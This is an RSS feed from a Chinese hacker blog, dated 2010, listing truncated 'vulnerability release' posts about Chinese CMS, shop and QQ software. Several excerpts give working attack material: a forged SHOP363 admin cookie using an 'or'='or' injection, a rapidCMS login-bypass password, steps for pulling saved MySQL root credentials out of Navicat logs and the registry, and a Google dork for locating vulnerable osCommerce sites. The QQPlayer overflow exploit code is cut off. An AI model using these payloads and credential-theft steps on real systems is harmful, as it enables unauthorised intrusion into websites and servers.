<?xml version="1.0" standalone="yes"?>
<?xml-stylesheet type="text/xsl" href="css/rss.xslt"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>凌风[0x0F]'s BloG - 漏洞发布</title><link>http://www.l14of.com/</link><description>Get More Fun! - </description><generator>RainbowSoft Studio Z-Blog 1.8 Walle Build 100427</generator><language>zh-CN</language><copyright>请注意:本站部分文章为网络转载,如有侵权及非法行为,请联系站长Email:web#l14of.com,谢谢合作</copyright><pubDate>Sun, 05 Sep 2010 07:42:14 +0800</pubDate><item><title>动易６.６　６.７注入漏洞</title><author>wantusirui@foxmail.com (0x0F)</author><link>http://www.l14of.com/post/79.html</link><pubDate>Fri, 13 Aug 2010 08:53:52 +0800</pubDate><guid>http://www.l14of.com/post/79.html</guid><description><![CDATA[<p>[!]作者 :seraph<br />[!]QQ :81413170<br />[!]程序名称 ;动易<br />[!]包含版本 :6.6,6.7<br />[!]漏洞文件 :payonline/autorecive1.asp<br />[!]漏洞描述 :参数未过滤，可产生注入漏洞<br />[!]危害程度 :低<br />[!]首发日期 :2010-8-12<br />************************************************************************<br />...</p>]]></description><category>漏洞发布</category><comments>http://www.l14of.com/post/79.html#comment</comments><wfw:comment>http://www.l14of.com/</wfw:comment><wfw:commentRss>http://www.l14of.com/feed.asp?cmt=79</wfw:commentRss><trackback:ping>http://www.l14of.com/cmd.asp?act=tb&amp;id=79&amp;key=bedeb37c</trackback:ping></item><item><title>QQ2010SP1(版本号1760)有巨大漏洞</title><author>wantusirui@foxmail.com (0x0F)</author><link>http://www.l14of.com/post/71.html</link><pubDate>Wed, 28 Jul 2010 19:39:30 +0800</pubDate><guid>http://www.l14of.com/post/71.html</guid><description><![CDATA[<p><a href="http://hi.baidu.com/hnaker/blog/item/3ff5633d46918ff7828b1387.html">http://hi.baidu.com/hnaker/blog/item/3ff5633d46918ff7828b1387.html</a></p><p>&nbsp;</p>]]></description><category>漏洞发布</category><comments>http://www.l14of.com/post/71.html#comment</comments><wfw:comment>http://www.l14of.com/</wfw:comment><wfw:commentRss>http://www.l14of.com/feed.asp?cmt=71</wfw:commentRss><trackback:ping>http://www.l14of.com/cmd.asp?act=tb&amp;id=71&amp;key=79a436f3</trackback:ping></item><item><title>利用navicat提权</title><author>wantusirui@foxmail.com (0x0F)</author><link>http://www.l14of.com/post/69.html</link><pubDate>Mon, 26 Jul 2010 01:23:42 +0800</pubDate><guid>http://www.l14of.com/post/69.html</guid><description><![CDATA[<p><strong><font color="#ff0000">navicat是一个比较流行的MySQL管理工具，在很多服务器上都可以找到<br /><br /></font></strong>有两个方法提权：<br /><br />1、从日志文件里找密码，navicat会把操作日志（比如加账户）保存到My Documents\Navicat\MySQL\logs下的LogHistory.txt，低版本是安装目录下的logs下LogHistory.txt<br /><br />2、navicat管理的MySQL服务器信息（一般是root帐户）是存在注册表里的，具体是HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers下，导出注册表导入到本机然后星号察看就OK了。。<br />...</p>]]></description><category>漏洞发布</category><comments>http://www.l14of.com/post/69.html#comment</comments><wfw:comment>http://www.l14of.com/</wfw:comment><wfw:commentRss>http://www.l14of.com/feed.asp?cmt=69</wfw:commentRss><trackback:ping>http://www.l14of.com/cmd.asp?act=tb&amp;id=69&amp;key=a6a3882e</trackback:ping></item><item><title>SHOP363网店系统通杀漏洞</title><author>wantusirui@foxmail.com (0x0F)</author><link>http://www.l14of.com/post/68.html</link><pubDate>Mon, 26 Jul 2010 01:23:19 +0800</pubDate><guid>http://www.l14of.com/post/68.html</guid><description><![CDATA[<p>COOKIES欺骗，下面的是COOKIES利用代码：</p><p><br />Sy%5FShops=TFlags=1%2C2%2C3%2C4%2C5%2C11%2C12%_2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C21%2C22%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C41%2C42%2C43%_2C44%2C51%2C52%2C53%2C54%2C55%2C56%2C61%2C62%2C63%2C64&amp;AdminoldFlags=1&amp;Truename=%CE%_DE&amp;AdminFlags=1&amp;AdminPassword='or'='or'&amp;AdminName='or'='or';</p>...]]></description><category>漏洞发布</category><comments>http://www.l14of.com/post/68.html#comment</comments><wfw:comment>http://www.l14of.com/</wfw:comment><wfw:commentRss>http://www.l14of.com/feed.asp?cmt=68</wfw:commentRss><trackback:ping>http://www.l14of.com/cmd.asp?act=tb&amp;id=68&amp;key=8dd3a8df</trackback:ping></item><item><title>dedecms5.6注入漏洞分析与利用</title><author>wantusirui@foxmail.com (0x0F)</author><link>http://www.l14of.com/post/67.html</link><pubDate>Sun, 25 Jul 2010 13:48:17 +0800</pubDate><guid>http://www.l14of.com/post/67.html</guid><description><![CDATA[<p>转自xhming</p>]]></description><category>漏洞发布</category><comments>http://www.l14of.com/post/67.html#comment</comments><wfw:comment>http://www.l14of.com/</wfw:comment><wfw:commentRss>http://www.l14of.com/feed.asp?cmt=67</wfw:commentRss><trackback:ping>http://www.l14of.com/cmd.asp?act=tb&amp;id=67&amp;key=9ae0c7c6</trackback:ping></item><item><title>马克斯CMS2.0beta (maxcms)SQL注入和管理员认证绕过漏洞</title><author>wantusirui@foxmail.com (0x0F)</author><link>http://www.l14of.com/post/66.html</link><pubDate>Sun, 25 Jul 2010 13:42:48 +0800</pubDate><guid>http://www.l14of.com/post/66.html</guid><description><![CDATA[<p>这个系统是国内非常流行的视频点播系统，之前的1.5版本漏洞非常多，2.0版本在安全方面有所提高，但是依然有漏洞存在。</p>]]></description><category>漏洞发布</category><comments>http://www.l14of.com/post/66.html#comment</comments><wfw:comment>http://www.l14of.com/</wfw:comment><wfw:commentRss>http://www.l14of.com/feed.asp?cmt=66</wfw:commentRss><trackback:ping>http://www.l14of.com/cmd.asp?act=tb&amp;id=66&amp;key=2f5b206d</trackback:ping></item><item><title>QQPlayer 文件缓冲区溢出漏洞</title><author>wantusirui@foxmail.com (0x0F)</author><link>http://www.l14of.com/post/65.html</link><pubDate>Sun, 25 Jul 2010 11:26:44 +0800</pubDate><guid>http://www.l14of.com/post/65.html</guid><description><![CDATA[<div class="wp-caption alignleft" id="attachment_237" style="width: 310px"><img class="size-medium wp-image-237" title="QQPlayerCUE文件缓冲区溢出漏洞" height="207" alt="QQPlayerCUE文件缓冲区溢出漏洞" src="http://www.l14of.com/upload/201007251130150225.png" width="300" />...</div>]]></description><category>漏洞发布</category><comments>http://www.l14of.com/post/65.html#comment</comments><wfw:comment>http://www.l14of.com/</wfw:comment><wfw:commentRss>http://www.l14of.com/feed.asp?cmt=65</wfw:commentRss><trackback:ping>http://www.l14of.com/cmd.asp?act=tb&amp;id=65&amp;key=3b0952b9</trackback:ping></item><item><title>EZ-Oscommerce 3.1 文件上传漏洞</title><author>wantusirui@foxmail.com (0x0F)</author><link>http://www.l14of.com/post/64.html</link><pubDate>Sun, 25 Jul 2010 11:11:04 +0800</pubDate><guid>http://www.l14of.com/post/64.html</guid><description><![CDATA[<p>EZ-Oscommerce 3.1程序针对其上传进行严格验证和过滤，可以上传任意恶意代码。google :Powered by osCommerce 或者Customized by EZ-Oscommerce</p>]]></description><category>漏洞发布</category><comments>http://www.l14of.com/post/64.html#comment</comments><wfw:comment>http://www.l14of.com/</wfw:comment><wfw:commentRss>http://www.l14of.com/feed.asp?cmt=64</wfw:commentRss><trackback:ping>http://www.l14of.com/cmd.asp?act=tb&amp;id=64&amp;key=5fccab34</trackback:ping></item><item><title>rapidCMS V2 后台认证绕过漏洞</title><author>wantusirui@foxmail.com (0x0F)</author><link>http://www.l14of.com/post/63.html</link><pubDate>Sun, 25 Jul 2010 11:10:28 +0800</pubDate><guid>http://www.l14of.com/post/63.html</guid><description><![CDATA[<p>rapidCMS V2 后台登录认证未经过严格过滤，导致万能密码绕过漏洞。</p><p>利用方法：</p><p>User:xxoo <br />Pass: ' OR '1'='1</p><p>Demo : <a href="http://site/admin.php">http://site/admin.php</a></p>]]></description><category>漏洞发布</category><comments>http://www.l14of.com/post/63.html#comment</comments><wfw:comment>http://www.l14of.com/</wfw:comment><wfw:commentRss>http://www.l14of.com/feed.asp?cmt=63</wfw:commentRss><trackback:ping>http://www.l14of.com/cmd.asp?act=tb&amp;id=63&amp;key=817fc94a</trackback:ping></item><item><title>QQ影音ASX和CUE文件处理栈溢出漏洞</title><author>wantusirui@foxmail.com (0x0F)</author><link>http://www.l14of.com/post/62.html</link><pubDate>Sun, 25 Jul 2010 11:09:48 +0800</pubDate><guid>http://www.l14of.com/post/62.html</guid><description><![CDATA[<pre>QQ影音是腾讯公司推出的一款支持任何格式影片和音乐文件的本地播放器。用户受骗使用QQ影音打开了特制的ASX或CUE文件就可以触发栈溢出，导致执行任意代码。</pre><pre><font color="#ff0000">测试代码：</font></pre><pre><font color="#ff0000"><pre>#!/usr/bin/env python#################################################################...</font></pre></pre>]]></description><category>漏洞发布</category><comments>http://www.l14of.com/post/62.html#comment</comments><wfw:comment>http://www.l14of.com/</wfw:comment><wfw:commentRss>http://www.l14of.com/feed.asp?cmt=62</wfw:commentRss><trackback:ping>http://www.l14of.com/cmd.asp?act=tb&amp;id=62&amp;key=c1a1235c</trackback:ping></item></channel></rss>
